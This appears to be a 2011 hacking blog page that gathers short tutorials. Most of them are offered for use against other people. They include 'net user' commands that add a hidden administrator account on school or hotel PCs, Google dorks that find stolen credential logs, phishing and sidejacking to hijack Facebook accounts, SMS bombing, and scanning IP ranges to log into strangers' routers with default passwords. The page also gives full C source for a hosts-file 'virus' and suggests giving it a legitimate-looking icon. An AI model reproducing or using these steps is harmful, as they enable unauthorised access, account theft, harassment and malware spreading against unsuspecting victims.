Thursday 22 December 2011

How to get a admin account on a school pc

How to get a admin account on a school pc or a pc in a hotel which you can rent to get connection to the internet.
1) On most of this Pc you cant use cmd because its disabled thats why we have to get it. Open Editor and write this into it:
@echo
@command
@comannd.com
// save it with the name cmd.bat

2) Now we have to create our account :
write in cmd :
net user Admin2 /add
3) ok now we have our account now we have to give him admin rights
write this into cmd :
net localgroup Administratoren Admin2 /add
4) Ok now you have your Admin user account. Now you have to opportunities.
First : You can save the acc with a password. You only need to type this text into cmd:
net user Admin2*
Second : You can delete your account write this:
net user Admin2 /del

To write messages between differt user you only need to write in cmd :
msg OtherUser *
Then you get a textfield where you can write your message into.
If your finish with your text write "^Z" and press enter

have fun smile
if you like it dont forget +rep+

Tuesday 20 December 2011

Hacking Facebook With Phishing

Hello Friends,



Today i will be teaching the easiest way to hack Facebook Id.There are many people who want to Hack Facebook ID. Well here is the simplest, quickest and easiest method. It is called Phishing. In this method the victim is made to enter his login details on a fake facebook login page.

Friday 9 December 2011

How To:Hack YouTube to Increase YouTube Views!

YouTube is the best video sharing site with millions of users registered. Getting lots of views and subscribers is very important for you popularity on YouTube. In this tutorial I will teach you & show you how to get more then 100, 000 views on YouTube. Its totally free & simple… All you need is little time, good internet connection & proxy list.
1. First of all Download YouTube Increaser from the official site.
2. Install and run the software to see something like this:

Thursday 8 December 2011

Anonymize Yourself With The Best Free VPN

As , All U Have experienced problems while accessing , FB, Orkut , And Other Services
from your school and others…

Just Use This Program… and everything becomes unrestricted…
This Is A VPN (Virtual Private Network) software ..
which anonyizes ur daily surfs …
Download Link:
Click Here To Download 
Download The Crack:( Requires .NET Framework 4)
Click Here To Download 
(Copy It In The Ifreevpn Program Files Folder)
(Password For The Crack : freevpnsetup)
Also If U Dnt Have .NET Framework 4 Link  is below:
Download It Here

Tuesday 6 December 2011

How to:Get Logs of Premium Accounts You Want

How to get logs of premium accounts you want

Hey guys !
I`m gonna show u my next trick to find logs
This time i will learn you how to get logs for a specified website !Example :
I want a megaupload account ! We know that in many hacking forums , there are shared hundred logs from iStealer , and sure , they can be megaupload premium accounts !
So how we will get them ?
As in my first tutorial , first go to google.com !
Next , in the search field you must paste the following dork :
Code:
Program: Url/Host:http://www.megaupload.com Login: Password: Computer: Date: Ip:
So with this dork , i`m gonna get Megaupload accounts !
If you want for example Rapidshare accounts
change the url to http://www.rapidshare.com !!
And then , after you hit Enter ,
just EnjoY with the results !

Basic Steps To Become A Hacker!

Introduction
Hello and welcome to this tutorial. If you see all the text on this page, and are afraid, you’re not meant to be a hacker, quit now. Also, please know now that unlike in the movies, not everything is hackable. I will be writing about the basics of hacking servers; I will cover how to scan and/or exploit vulnerable daemons (services) running on the target server, and how to discover and/or exploit web-script vulnerabilities.

readmore>>

Monday 5 December 2011

Self-XSS (Cross Site Scripting) – Social Engineering Attack and Prevention

Hello friends, my name is piyush and today I am going to explain about Self-XSS. Self-XSS is a Social Engineering Attack and I will also discuss its prevention points.



–> Recently, Hackers Attacked Facebook with explicit hardcore porn images. Facebook says it might be self-Xss

read more>>

XSS Tutorial , Cross Site Scripting Complete Method

XSS Tutorial
XSS is an abbreviation for Cross Site Scripting. It uses an X rather than a C in order to reduce confusion between Cascading Style Sheets and Cross Site Scripting. Follow the steps below to perform an XSS attack.

1. Testing for XSS:
First you must check if the website is vulnerable to an XSS injection.
To do this, find a text input field on the νictim website. The text that you input must be shown somewhere on the website. Some common XSS injection locations are your username, signature, or contact information on a member profile, a post or thread on a forum, or a web search that reflects your search(“You searched for TEXT”).
Once you find a location on the website that fits the above requirements you can input a test injection. Enter <script>alert(1)</script> into the text field and submit the form. It should return an alert(pop up) containing the number 1. Remember to try this in multiple browsers, as some like Google Chrome aren’t affected by all XSS injections and may not create an alert.
read more>>

How To: Use Netcat To Get All Server Information

Download NetCat…
If u r using windows XP then copy it to “C:\WINDOWS\system32″ as it is the default location of the CMD commands…
Now creat a file Get.txt in “C” drive with the following lines in it
GET / HTTP/1.0
Make sure u leave a blank line beneath it….
Now open RUN or press Windows Logo Key + R….
Then type CMD
In the command prompt type cd\
This will take u to C:\
Then type nc -v www.site.com 80 < get.txt
And press enter
Where www.site.com is the website about which u want to extract the info…..
And u will get the information…..
Alternative method….
It is much more eassy…..
open RUN or press windows logo key + R….
Then type CMD
In the command prompt type nc -v www.site.com 80
Press enter
Then type GET / HTTP/1.0
And hit a couple of returns
And u will get the required info…..
[NOTE: Remember 80 is the default port for HTTP]

How To: SMS Bomb With Mozilla Firefox [Tut]

1.Visit Imacro and install the addon for Firefox..

2.Restart the browser.3.Visit the SMS sending site.
(Most of them require registration .Register and login in to your account) for eg: 160by2 – Free SMS 4.Click the imacro icon imacro…. 5.Click Rec tab and Click “Record” button.
6.Now start sending sms to your buddies as usual.Once you have Sent a single message , Click “stop” and Save your macro giving it a name.
7.When you are still logged in .Play the macro in a LOOP the limit of the loop corresponds to number of sms you want to flood your friends with.

Side Jacking Attack : Hack FB and Twitter Accounts


When logging into a website you usually start by submitting your
username and password. The server then checks to see if an account
matching this information exists and if so, replies back to you with a
“cookie” which is used by your browser for all subsequent requests.
It’s extremely common for websites to protect your password by
encrypting the initial login, but surprisingly uncommon for websites to
encrypt everything else. This leaves the cookie (and the user)
vulnerable. HTTP session hijacking (sometimes called “sidejacking”) is
when an attacker gets a hold of a user’s cookie, allowing them to do
anything the user can do on a particular website. On an open wireless
network, cookies are basically shouted through the air, making these
attacks extremely easy.
This is a widely known problem that has been talked
about to death, yet very popular websites continue to fail at protecting
their users. The only effective fix for this problem is full end-to-end
encryption, known on the web as HTTPS or SSL. Facebook is constantly
rolling out new “privacy” features in an endless attempt to quell the
screams of unhappy users, but what’s the point when someone can just
take over an account entirely? Twitter forced all third party developers
to use OAuth then immediately released (and promoted) a new version of
their insecure website. When it comes to user privacy, SSL is the
elephant in the room.
Firesheep, a Firefox extension designed to demonstrate just how serious this problem is.
After installing the extension you’ll see a new sidebar. Connect to any
busy open wifi network and click the big “Start Capturing” button. Then
wait.

As soon as anyone on the network visits an insecure website known to Firesheep, their name and photo will be displayed:

Double-click on someone, and you’re instantly logged in as them.

That’s it.
Firesheep is free, open source, and is available now for Mac OS X and Windows. Linux support is on the way.
Websites have a responsibility to protect the people who depend on their
services. They’ve been ignoring this responsibility for too long, and
it’s time for everyone to demand a more secure web.
Download Link
Enjoy…….

Hacking websites. Basic Tutorial for beginners

Hello guys. I was a bit busy, so after a long time I’ll be posting something new for the beginners in the world of hacking. Today I tell you how to hack websites using common vulnerabilities. Note: I believe you have some basic knowledge of HTML and PHP :) Intended for educational purpose. Bad intentions, GET LOST!!!!!!!
So lets begin ;)

read more>>

Google translator can be used for proxy!!!



Yes guys google translator can be used for proxy. Last week I was translating some french site to english. Accidentally, a saved site i.e. ip-adress.com got entered by me in the translation URL. The ip address it displayed was different from my original one :D . This point revealed that google translator can be used for proxy purpose. Later I tested other sites too, and they all were notifying different ip address. Strange but we have found some thing new. Keep reading guys ;)
click to enlarge
click to enlarge

How To: Perform Batch File Hacking

Batch file hacking isvery fun oh yeaa in thispage i will teach some tricksand about them.

What Is A Batch File?
A batch file is a MS-DOS file that will execute certain commands these files are usually made with notepad, Alot of people think batch files are nooby but if you know what your doing they can actually be quite powerful and by powerful i mean
deleting a whole C:/ Drive.Whats CMD?

read more>>

Saturday 3 December 2011

-: Creating IM Bot :-


This quick tutorial will show you how to develop your own functional IM bot that works with Google Talk, Yahoo! Messenger, Windows Live and all other popular instant messaging clients.
To get started, all you need to know are some very basic programming skills (any language would do) and web space to host your “bot”.
For this example, I have created a dummy bot called “insecure” that listens to your IM messages. To see this live, add insecure@bot.im to your GTalk buddy list and start chatting.

IM Bot

If you like to write a personal IM bot, just follow these simple steps:-
Step 1: Go to www.imified.com and register a new account with a bot.
Step 2: Now it’s time to create a bot which is actually a simple script that resides on your public web server.
It could be in PHP, Perl, Python or any other language.
Example Hello World bot:
The example below illustrates just how easy it is to create a bot.
This example is coded in PHP.
<?php
switch ($_REQUEST['step']) {
case 1:
echo "Hi, what's your name?";
break;
case 2:
echo "Hi " . $_REQUEST['value1'] . ", where do you live?";
break;
case 3:
echo "Well, welcome to this hello world bot, " . $_REQUEST['value1'] . "<br>from " . $_REQUEST['value2'] . ".<reset>";
break;
}
?>
Step 3: Once your script is ready, put it somewhere on your web server and copy the full URL to the clipboard.
Step 4: Now login to your imified account, paste the script URL

Screen Name: insecure@bot.im
Bot Script URL: http://www.insecure.in/imbot.php

Step 5: Add that im bot your friends list. That’s it.
This is a very basic bot but the possibilities are endless.
For instance, you could write a bot that will send an email to all your close friends via a simple IM message. Or you could write one that will does currency conversion
A new facebook exploit allows anyone to access any photo album of non-friends as long as you have the link.
Facebook Photo Exploit
By following the simple steps shown in above image, you can bypass the security of Facebook and view photos of others online.

Install xp from pen drive usb drive

In this article form our series of XP tips n trick I will show you how can you install XP from pen drive. This trick is best suitable for EeePC, other notebooks, laptops without or broken CD drive.
Perquisites for installing xp from pen drive
  • Windows Xp installation disk,
  • This file solution.rar
  • A working pen drive of at least 2 GB.
We first have to make pen drive bootable and need to put all necessary files in it. To do this go on a running computer which have working CD – ROM.
Now download this file solution.rar and extract it.
install xp from pen drive
Attach a pen drive (caution: - all data will be erase from pen drive)
Now go in the folder where you extracted the files from solution.rar and run HpUSBformat.exe.
install xp from pen drive
This command will auto detect your USB disk, if not, select form the list ( in this example my USB memory stick is drive M: )
Now set these options
  • Volume label : - SYSTEM
  • Check marks on :- Create a DOS Start up disk
  • Select radio button :- Using DOS system files located at:
  • Give the path where you have extracted solution.rar (Give the path of DOS folder) files
install xp from pen drive
now you have got an USB disk with bootable DOS system on it.
Copy all other files from DOS folder to your USB disk. ( you can overwrite existing ones)
install xp from pen drive
Put your Windows Xp installation disk into CD-ROM and copy all files from CD to USB drive.
Now your pen drive should look like this
install xp from pen drive
Now you have a bootable pen drive with xp.

Go on computer in which you want to install xp

Boot your laptop with previously prepared USB drive ( if you have problems, just check your BIOS or try to access boot menu, DEL? F10? F11?. In bios set first boot to removable media.)And follow these nine easy step to install xp.
Step1:- When system is booted up, and you see command prompt, type sys d: and hit enter if you see system transferred - you have luck, FAT32 file system is on drive C:, you will not lose your data
- go to step 5
- if any problem appears go to step 2
Step2:-REMEMBER, you will loose all data from drive C:/> - when system is booted up from USB, your drive C: appears as D:
Step3:- Type format d:/q/s to format drive D:
accept and when it is finished, go to step 5 ( you are lucky, you don't need to make partitions)
otherwise go to step 4
Step4:- Type fdisk and hit enter
create new partition ( after restart boot with pendrive in)
go to step 3 and format the partitions and come back here :)
type pqmagic and set your new partition active
( physical drive 2, Advanced A, set Active - S, are you sure - Y, Exit - X )
Step5:-Type nc and hit enter, and using Norton Commander, copy all files form pendrive to disk C: ( you can overwrite existing ones)
Step6:-Restart Laptop without pen drive in it (it should start from hard drive)
Step7:-Type cd i386 and hit enter (it will enter i386 folder)
Step8:-Type winnt and hit enter
Step9:-this will launch xp installation process and you can install xp as you do with cd.

Thursday 1 December 2011

Exposing 25 Facebook phishing websites

Exposing 25 Facebook phishing websites

Geeks at Security Web-Center Found 25 Facebook and list them. Sometimes spammers create fake pages that look like the Facebook login page. When you enter your email and password on one of these pages, the spammer records your information and keeps it. This is called phishing. The fake sites, like the one below, use a similar URL to Facebook.com in an attempt to steal people's login information.
The people behind these websites, then use the information to access victims' accounts and send messages to their friends, further propagating the illegitimate sites. In some instances, the phishers make money by exploiting the personal information they've obtained.

List of Fake Sites Collected by Security Web-Center:
http://www.sanagustinturismo.co/Facebook/
http://www.facebook.pcriot.com/login.php
http://deadlyplayerx.binhoster.com/Facebook/securelogin.php
http://facelook.shop.co/login.php
http://sigininto.horizon-host.com/facbook/facebook.php
http://custom-facebook.info/facebook.htm
http://www.profile.co.gp/facebook
http://s6.mywibes.com/facebook.htm
http://www.fjtech.us/
http://myoneid.site90.com/
http://facedook.co.gp/wwwfacebookcomprofilephpid100001548737188.htm
http://faceebook-com.bugs3.com/login/Secured_Re-login/index1.html
http://facebooook.axfree.com/
http://combatarms.free.fr/
http://sweed.web44.net/
http://thekshitij.in/facebook/index1.html
http://addgames.awardspace.biz/
http://www.profile.co.gp/facebook/
http://www.sjscheat.com/Hosting%20blogger/facebook
http://h1.ripway.com/denal/
http://1337r00t.13.ohost.de/r00tw00tkn00wn/
http://faacebok.zapto.org/
http://h4ck3rgadungan.adfoo.info/index1.html
http://www.2498.b.hostable.me/
Note: Please Don't Try to login on above listed websites.

Recently, Facebook phishing emails are threatening to delete users’ Facebook accounts unless the victims pass along their account details within 24 hours, as Posted by NakedSecurity

A typical phishing scam reads like this:
LAST WARNING : Your account is reported to have violated the policies that are considered annoying or insulting Facebook users. Until we system will disable your account within 24 hours if you do not do the reconfirmation.
Please confirm your account below:
[Link Removed]
Thanks.
The Facebook Team
Copyright facebook © 2011 Inc. All rights reserved.

The emails are entirely bogus. They are not coming from Facebook. Social media venues would not request financial information, nor would they request login details.The scams are, in fact, designed to steal credit card numbers and social media accounts.  When someone has been phished, their account will often start automatically sending messages or links to a large number of their friends. These messages or links are often advertisements telling friends to check out videos or products. If your Facebook account is automatically sending out spammy messages or links, secure it here.

Make sure that when you access the site, you always log in from a legitimate facebook.com domain. A good rule of thumb is if a URL ends in facebook.com, it is owned by Facebook. For example, "en-gb.facebook.com" ends in facebook.com and is therefore safe and legitimate.

Wednesday 30 November 2011

How to Hack an Ethernet ADSL Router


ADSL-RoutersAlmost half of the Internet users across the globe use ADSL routers/modems to connect to the Internet however, most of them are unaware of the fact that it has a serious vulnerability which can easily be exploited even by a noob hacker just like you. In this post I will show you how to exploit a common vulnerability that lies in most ADSL routers so as to gain complete access to the router settings and ISP login details.
Every router comes with a username and password using which it is possible to gain access to the router settings and configure the device. The vulnerability actually lies in the Default username and password that comes with the factory settings. Usually the routers come preconfigured from the Internet Service provider and hence the users do not bother to change the password later. This makes it possible for the attackers to gain unauthorized access and modify the router settings using a common set of default usernames and passwords. Here is how you can do it.
Before you proceed, you need the following tool in the process
Angry IP Scanner
Here is a detailed information on how to exploit the vulnerability of an ADSL router.
Step-1: Go to www.whatismyipaddress.com. Once the page is loaded you will find your IP address. Note it down.
Step-2: Open Angry IP Scanner, here you will see an option called IP Range: where you need to enter the range of IP address to scan for.
Suppose your IP is 117.192.195.101, you can set the range something as 117.192.194.0 to 117.192.200.255 so that there exists atleast 200-300 IP addresses in the range.
 
Step-3: Go to Tools->Preferences and select the Ports tab. Under Port selection enter 80 (we need to scan for port 80). Now switch to the Display tab, select the option “Hosts with open ports only” and click on OK.
IP Scanner
I have used Angry IP Scanner v3.0 beta-4. If you are using a different version, you need to Go to Options instead of Tools
 
Step-4: Now click on Start. After a few minutes, the IP scanner will show a list of IPs with Port 80 open as shown in the below image.
IP Scanner
 
Step-5: Now copy any of the IP from the list, paste it in your browser’s address bar and hit enter. A window will popup asking for username and password. Since most users do not change the passwords, it should most likely work with the default username and password. For most routers the default username-password pair will be admin-admin or admin-password.
Just enter the username-password as specified above and hit enter. If you are lucky you should gain access to the router settings page where you can modify any of the router settings. The settings page can vary from router to router. A sample router settings page is shown below.
Router Settings Page
 
If you do not succeed to gain access, select another IP from the list and repeat the step-5. Atleast 1 out of 5 IPs will have a default password and hence you will surely be able to gain access.
 

What can an Attacker do by Gaining Access to the Router Settings?

By gaining access to the router settings, it is possible for an attacker to modify any of the router settings which results in the malfunction of the router. As a result the target user’s computer will be disconnected from the Internet. In the worst case the attacker can copy the ISP login details from the router to steal the Internet connection or play any kind of prank with the router settings. So the victim has to reconfigure the router in order to bring it back to action.
 

The Verdict:

If you are using an ADSL router to connect to the Internet, it is highly recommended that you immediately change your password to prevent any such attacks in the future. Who knows, you may be the next victim of such an attack. 
Since the configuration varies from router to router, you need to contact your ISP for details on how to change the password for your model.
Warning!
All the information provided in this post are for educational purposes only. Please do not use this information for illegal purposes.

Advanced Google Search

In this post I will show you some of the secrets of Advanced Google Search.
Google is clearly the best general-purpose search engine on the Web. But most people don’t use it to its best advantage or in an advanced way. Do you just plug in a keyword or two and hope for the best? That may be the quickest way to search, but with more than 3 billion pages in Google’s index, it’s still a struggle to pare results to a manageable number. There are some ways in which advanced Google search can be used to get the desired results.
But Google is an remarkably powerful tool that can ease and enhance your Internet exploration. Advanced Google search options go beyond simple keywords, the Web, and even its own programmers. Let’s look at some of the advanced Google search options.

Syntax Search Tricks

Using a special syntax is a way to tell Google that you want to restrict your searches to certain elements or characteristics of Web pages. Here are some advanced Google search operators that can help narrow down your search results.
1. Intitle: at the beginning of a query word or phrase (intitle:”Three Blind Mice”) restricts your search results to just the titles of Web pages.
2. Intext: does the opposite of intitle:, searching only the body text, ignoring titles, links, and so forth. Intext: is perfect when what you’re searching for might commonly appear in URLs. If you’re looking for the term HTML, for example, and you don’t want to get results such as
www.gohacking.com/index.html
you can enter intext:html
3. Link: lets you see which pages are linking to your Web page or to another page you’re interested in. For example, try typing in
4. site: (which restricts results to top-level domains) with intitle: to find certain types of pages. For example, get scholarly pages about Mark Twain by searching for intitle:”Mark Twain”site:edu. Experiment with mixing various elements; you’ll develop several strategies for finding the stuff you want more effectively. The site: command is very helpful as an alternative to the mediocre search engines built into many sites.

Swiss Army Google

Google has a number of services that can help you accomplish tasks you may never have thought to use Google for. For example, the new calculator feature (Google Calculator) lets you do both math and a variety of conversions from the search box. For extra fun, try the query “Answer to life the universe and everything.”
Suppose you want to contact someone and don’t have his phone number handy. Google can help you with that, too. Just enter a name, city, and state. (The city is optional, but you must enter a state.) If a phone number matches the listing, you’ll see it at the top of the search results along with a map link to the address. If you’d rather restrict your results, use rphonebook: for residential listings or bphonebook: for business listings. If you’d rather use a search form for business phone listings, try Yellow Search
Let Google help you figure out whether you’ve got the right spelling—and the right word—for your search. Enter a misspelled word or phrase into the query box (try “thre blund mise”) and Google may suggest a proper spelling. This doesn’t always succeed; it works best when the word you’re searching for can be found in a dictionary. Once you search for a properly spelled word, look at the results page, which repeats your query. (If you’re searching for “three blind mice,” underneath the search window will appear a statement such as Searched the web for “three blind mice.”) You’ll discover that you can click on each word in your search phrase and get a definition from a dictionary.

Extended Googling

Google offers several advanced services that give you a head start in focusing your search. Google Groups (Google Groups) indexes literally millions of messages from decades of discussion on Usenet. Google even helps you with your shopping via two tools:
Froogle CODE (FroogleCODE),
which indexes products from online stores, and Google CatalogsCODE(Google Catlogs),
which features products from more 6,000 paper catalogs in a searchable index. And this only scratches the surface. You can get a complete list of Google’s tools and services at www.google.com/options/index.html
You’re probably used to using Google in your browser. But have you ever thought of using Google outside your browser?
Google Alert
http://www.googlealert.com
monitors your search terms and e-mails you information about new additions to Google’s Web index. (Google Alert is not affiliated with Google; it uses Google’s Web services API to perform its searches.) If you’re more interested in news stories than general Web content, check out the beta version of Google News Alerts
This advanced Google service (which is affiliated with Google) will monitor up to 50 news queries per e-mail address and send you information about news stories that match your query. (Hint: Use the intitle: and source: syntax elements with Google News to limit the number of alerts you get.)
Google on the telephone? Yup. This service is brought to you by the folks at Google Labs
a place for experimental Google ideas and features (which may come and go, so what’s there at this writing might not be there when you decide to check it out).
With Google Voice Search (Google Voice Search), you dial the Voice Search phone number, speak your keywords, and then click on the indicated link. Every time you say a new search term, the results page will refresh with your new query (you must have JavaScript enabled for this to work). Remember, this service is still in an experimental phase, so don’t expect 100 percent success.
In 2002, Google released the Google API (application programming interface), a way for programmers to access Google’s search engine results without violating the Google Terms of Service. A lot of people have created useful (and occasionally not-so-useful but interesting) applications not available from Google itself, such as Google Alert. For many applications, you’ll need an API key, which is available free from CODE www.google.com/apis

A Virus Program to Block Websites


Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.
This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-install’s the operating system. This blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any of the browser program.
NOTE: You can also block a website manually. But, here I have created a virus that automates all the steps involved in blocking. The manual blocking process is described in the post How to Block a Website ?
Here is the sourcecode of the virus.
#include<stdio.h>
#include<dos.h>
#include<dir.h> char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;
int find_root(void);
void block_site(void);
int find_root()
{
int done;
struct ffblk ffblk;//File block structure
done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
else return 0;
}
void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/
fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}
void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}
How to Compile ?
For step-by-step compilation guide, refer my post How to compile C Programs.
Testing
1. To test, run the compiled module. It will block the sites that is listed in the source code.
2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.
3. To remove the virus type the following the Run.
%windir%\system32\drivers\etc
4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this
127.0.0.1                                google.com
5. Delete all such entries which contain the names of blocked sites.
NOTE: You can also change the ICON of the virus to make it look like a legitimate program.This method is described in the post: How to Change the ICON of an EXE file ?